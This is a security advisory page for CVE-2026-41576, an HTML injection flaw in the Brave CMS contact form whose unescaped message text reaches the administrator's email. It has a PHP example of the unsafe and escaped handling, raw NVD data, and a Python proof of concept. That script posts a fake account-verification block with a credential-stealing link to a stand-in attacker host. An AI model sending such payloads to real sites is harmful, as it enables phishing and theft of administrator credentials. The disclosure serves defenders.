Security Vulnerability Report
CVE-2026-41576 CVSS 7.1 HIGH

CVE-2026-41576

Published: 2026-05-08 15:16:41
Last Modified: 2026-05-08 15:58:49

Description

Brave CMS is an open-source CMS. Prior to commit 6c56603, the contact form is publicly accessible (no authentication required). User-supplied message text is passed through PHP's nl2br() function, which converts newlines to <br> tags but does not escape HTML. The resulting string is then rendered in a Blade email template using the unescaped {!! $msg !!} directive. Because the HTML is not sanitized, arbitrary markup can be injected into the email body. While modern HTML-capable email clients (Gmail or Outlook Web) typically block JavaScript execution, they still render HTML content, which allows an attacker to craft a convincing phishing interface inside the email sent to the administrator. This issue has been patched via commit 6c56603.
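The unsafe and the corrected handling of the message text, as an added illustration rather than BraveCMS's own code (the project's controller and template names are not on this page, so the function names and the sample message below are constructed): the unsafe path runs nl2br() on raw input and prints it with {!! !!}, the safe path escapes first and only then inserts the line breaks, so the only markup reaching the template is the <br /> that nl2br() itself emits.

```php
<?php
// Added example, not BraveCMS's own code: the vulnerable nl2br() path beside the
// corrected one. Function names and the sample message are constructed for illustration.

// Vulnerable pattern: nl2br() inserts <br /> but leaves any HTML in the input intact.
// Rendered through Blade's {!! $msg !!}, the sender's markup reaches the mail client.
function formatMessageUnsafe(string $message): string
{
    return nl2br($message);
}

// Corrected pattern: escape first, then insert the line breaks. Laravel's e() helper
// wraps htmlspecialchars(), so the template form of this is {!! nl2br(e($msg)) !!}.
function formatMessageSafe(string $message): string
{
    $escaped = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return nl2br($escaped);
}

// Defender's check: after formatting, the only tag allowed to remain is the <br /> nl2br() emits.
function onlyLineBreakTags(string $html): bool
{
    return preg_match('#<(?!br\s*/?>)#i', $html) === 0;
}

// Constructed sample in the shape the advisory describes: a newline followed by a markup tag.
$sample = "Hello,\n<a href=\"https://example.invalid/verify\">Verify account</a>";

echo "unsafe: ", formatMessageUnsafe($sample), "\n";
var_dump(onlyLineBreakTags(formatMessageUnsafe($sample)));   // the sender's <a> tag survives

echo "safe:   ", formatMessageSafe($sample), "\n";
var_dump(onlyLineBreakTags(formatMessageSafe($sample)));     // only the generated <br /> remains
```

The same check can be run against whatever string the mailable actually passes to the template, which is the quickest way to confirm a deployment carries the fix.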

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Brave CMS < commit 6c56603

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable contact form
target_url = "http://target-brave-cms.com/contact"

# Malicious payload simulating a phishing interface inside the email body
# The payload injects a fake login form or a deceptive link
html_payload = """
<div style="text-align:center; font-family: Arial;">
<h3>Security Alert: Account Verification Required</h3>
<p>Please click the link below to verify your administrator account:</p>
<a href="http://attacker-controlled-site.com/steal-credentials" style="background-color:#4CAF50; color:white; padding:10px; text-decoration:none;">Verify Account</a>
</div>
"""

# Data to be sent in the POST request
form_data = {
    "name": "Admin User",
    "email": "[email protected]",
    "message": html_payload
}

try:
    response = requests.post(target_url, data=form_data)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check administrator email for injected HTML.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")
```

References

https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea
https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-x7cg-8grr-grvx

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41576",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T15:16:40.910",
    "lastModified": "2026-05-08T15:58:49.383",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Brave CMS is an open-source CMS. Prior to commit 6c56603, the contact form is publicly accessible (no authentication required). User-supplied message text is passed through PHP's nl2br() function, which converts newlines to <br> tags but does not escape HTML. The resulting string is then passed to a Blade email template using the unescaped {!! $msg !!} directive. The resulting content is then rendered in a Blade email template using the unescaped {!! $msg !!} directive. Because HTML is not sanitized, arbitrary markup can be injected into the email body. While modern HTML-capable email clients (Gmail or Outlook Web) typically block JavaScript execution, they still render HTML content. This allows attackers to craft convincing phishing interfaces inside the email sent to the administrator. This issue has been patched via commit 6c56603."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-x7cg-8grr-grvx",
        "source": "[email protected]"
      }
    ]
  }
}
```